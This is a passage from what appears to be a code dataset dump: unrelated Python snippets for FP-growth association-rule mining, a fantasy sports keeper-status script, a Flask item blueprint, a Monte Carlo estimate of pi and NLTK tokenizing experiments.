prefixPath = {}
beginNode = headPointTable[headPointItem][1]
prefixs = ascendTree(beginNode)
if ((prefixs != [])):
prefixPath[frozenset(prefixs)] = beginNode.count
while (beginNode.nextSimilarItem != None):
beginNode = beginNode.nextSimilarItem
prefixs = ascendTree(beginNode)
if (prefixs != []):
prefixPath[frozenset(prefixs)] = beginNode.count
return prefixPath
def ascendTree(treeNode):
prefixs = []
while ((treeNode.nodeParent != None) and (treeNode.nodeParent.nodeName != 'null')):
treeNode = treeNode.nodeParent
prefixs.append(treeNode.nodeName)
return prefixs
def rulesGenerator(frequentPatterns, minConf, rules, data_length):
for frequentset in frequentPatterns:
if (len(frequentset) > 1):
getRules(frequentset, frequentset, rules, frequentPatterns, minConf, data_length)
def remove_str(set, str):
tempSet = []
for elem in set:
if (elem != str):
tempSet.append(elem)
tempFrozenSet = frozenset(tempSet)
return tempFrozenSet
def getRules(frequentset, currentset, rules, frequentPatterns, minConf, data_length):
for frequentElem in currentset:
subSet = remove_str(currentset, frequentElem)
confidence = frequentPatterns[frequentset] / frequentPatterns[subSet]
lift = frequentPatterns[frequentset] / (
frequentPatterns[subSet] * (frequentPatterns[frozenset([frequentElem])] / data_length))
if confidence >= minConf and lift > 1:
flag = False
for rule in rules:
if rule[0] == subSet and rule[1] == frequentset - subSet:
flag = True
if not flag:
rules.append((subSet, frequentset - subSet, confidence))
if len(subSet) >= 2:
getRules(frequentset, subSet, rules, frequentPatterns, minConf, data_length)
def take_num(elem):
return len(elem)
if __name__ == '__main__':
print("fptree:")
dataSet = load_dataset()
frozenDataSet = transfer_to_frozenset(dataSet)
minSupport = 3
fptree, headPointTable = createFPTree(frozenDataSet, minSupport)
fptree.disp()
frequentPatterns = {}
prefix = set([])
mineFPTree(headPointTable, prefix, frequentPatterns, minSupport)
print("频繁项集:")
pattern_list = []
for pattern in frequentPatterns:
pattern_list.append(list(set(pattern)))
pattern_list.sort(key=take_num)
for list_item in pattern_list:
print(list_item, end=" ")
minConf = 0.6
rules = []
rulesGenerator(frequentPatterns, minConf, rules, len(dataSet))
print("\n关联规则:")
for rule in rules:
print(set(rule[0]), '-->', set(rule[1]), "置信度为:", rule[2])
|
994,295 | ee113d352fe637ff2803f7e6c4592bc5f1f0a086 | from csv_writer import CSVWriter
from canonical_name import canonicalName
from current_team_name import currentTeamName
from draft_loader import DraftLoader
from keepers_loader import KeepersLoader
from player import Player
from player_status_finder import PlayerStatusFinder
from team import Team
from team_loader import TeamLoader
from team_owner import teamOwner
from transaction_loader import TransactionLoader
if __name__=="__main__":
currentYear = 2020
transactionLoader = TransactionLoader()
oneYearAgoTransactions = transactionLoader.load("data/transactions_" + str(currentYear - 1) + ".csv", 1)
twoYearsAgoTransactions = transactionLoader.load("data/transactions_" + str(currentYear - 2) + ".csv", 2)
draftLoader = DraftLoader()
oneYearAgoDraft = draftLoader.load("data/draft_" + str(currentYear - 1) + ".csv")
twoYearsAgoDraft = draftLoader.load("data/draft_" + str(currentYear - 2) + ".csv")
keepersLoader = KeepersLoader()
keepers = keepersLoader.load("data/keepers_" + str(currentYear - 1) + ".csv")
teams = []
teamLoader = TeamLoader()
for teamName, playerNamePositions in teamLoader.load("data/teams_" + str(currentYear) + ".csv"):
owner = teamOwner(currentTeamName(canonicalName(teamName)))
players = []
for playerNamePosition in playerNamePositions:
playerName = playerNamePosition[0]
position = playerNamePosition[1]
statusFinder = PlayerStatusFinder(canonicalName(playerName), position)
result = statusFinder.findStatus(currentYear, keepers, oneYearAgoTransactions, twoYearsAgoTransactions, None, oneYearAgoDraft, twoYearsAgoDraft, None)
if result is not None:
status, draftedYear, twoYearsAgoCost, oneYearAgoCost = result
players.append(Player(playerName, position, status, draftedYear, twoYearsAgoCost, oneYearAgoCost))
else:
raise Exception("Fail", "Missing player: " + playerName)
teams.append(Team(teamName, owner, players))
csvWriter = CSVWriter(teams, currentYear)
csvWriter.writeToCSV("out/status_" + str(currentYear) + ".csv")
while False:
player = input("Player?\n")
if player == "":
break
playerStatusFinder = PlayerStatusFinder(canonicalName(player))
status = playerStatusFinder.findStatus(currentYear, keepers, oneYearAgoTransactions, twoYearsAgoTransactions, None, oneYearAgoDraft, twoYearsAgoDraft, None)
statusRepresentation = playerStatusFinder.statusRepresentation(status)
print(statusRepresentation)
|
994,296 | 20c76bf6cb5343e4336bc3fa739238d00d7c85b5 | from flask import Blueprint, request, render_template,redirect,url_for
import json
from models.items import Item
item_blueprint = Blueprint("items",__name__)
@item_blueprint.route("/")
def index():
items = Item.getAll()
return render_template("item/index.html",items=items)
@item_blueprint.route("/new",methods=["GET","POST"]) # /items/new
def new_item():
if request.method == "POST":
url = request.form['url']
tag_name = request.form['tagName']
# query = request.form['query'] # query is string while it should be dictionary
query = json.loads(request.form['query']) # but string should be valid json format i.e. {"id":"..."}
Item(url,tag_name,query).save()
return redirect(url_for("items.index"))
return render_template("item/new_item.html")
|
994,297 | 6cd6af7251aa8c2f9d637871e884db133b250520 | # This problem was asked by Google.
# The area of a circle is defined as pi*r^2. Estimate pi to 3 decimal places using a Monte Carlo method.
# Hint: The basic equation of a circle is x2 + y2 = r2.
# pi*r^2 = Area of circle
# x^2 + y^2 = r^2
#
# l * w = Area of square
# (2r) * (2r) = 4r^2 = Area of square
#
# Therefore, ratio(p) = Area of circle / Area of square
# p = pi*r^2 / 4r^2 = pi / 4
# pi = p * 4
#
# we can use monte carlo method to pick points on unit circle and get a ratio of the points that land inside the unit circle compared to the unit square. Such a ratio is similar to area ratio of circle to square. == p
import random
import math
def findPi():
random.seed()
inCircle = 0.0
inSquare = 0.0
for i in range(0, 100000):
x = random.random()
y = random.random()
if x**2.0 + y**2.0 <= 1.0:
inCircle += 1.0
inSquare += 1.0
return (inCircle / inSquare) * 4.0
piMonteCarlo = findPi()
print "Estimate: %.3f" % piMonteCarlo
print "Actual: ", math.pi |
994,298 | 86489b68a938ab7d6f8023d31d7f3815e4556ac9 | import os
import subprocess
# This grabs book data
# subprocess.call(["java","-jar", "pdfbox-app-2.0.2.jar",
# "ExtractText", "/Users/terences/Downloads/approximate_injectivity.pdf",
# "output/approximate_injectivity.txt"])
import nltk
# nltk.download()
text_file = ""
with open("output/MLfH.txt") as f:
text_file = f.read()
text_file = text_file.decode('utf-8').strip()
# splits sentences
from nltk.tokenize import sent_tokenize
tokens = sent_tokenize(text_file)
# print tokens
# splits words
from nltk.tokenize import word_tokenize
tokens = word_tokenize(text_file)
# print tokens
# whitespace tokenizer
from nltk.tokenize import regexp_tokenize
tokenizer = regexp_tokenize(text_file,'\s+', gaps=True)
# print tokenizer
from nltk.corpus import stopwords
english_stops = set(stopwords.words('english'))
words = tokenizer
# print [word for word in words if word not in english_stops]
#look up words and print synset
from nltk.corpus import wordnet
syn = wordnet.synsets('cookbook')[0]
print syn.name()
print syn.definition()
print syn.hypernyms()
print syn.hypernyms()[0].hyponyms()
print syn.root_hypernyms()
print syn.hypernym_paths()
#
# for w in words:
# print w
# syn = wordnet.synsets(w)
# if (type(syn) == 'list'):
# syn = syn[0]
# # print syn
# if (len(syn) != 0):
# for i in syn:
# # print i
# # print '\t[', i.name(),']'
# print '\t--', i.definition()
from nltk.tag import UnigramTagger
from nltk.corpus import treebank
train_sents = treebank.tagged_sents()[:3000]
tagger = UnigramTagger(train_sents)
print tagger.tag(treebank.sents()[0])
|
994,299 | 21b0d4ef63797619f18d33b6c71892992e087797 | /Users/kmsnyder2/anaconda/lib/python3.6/copy.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.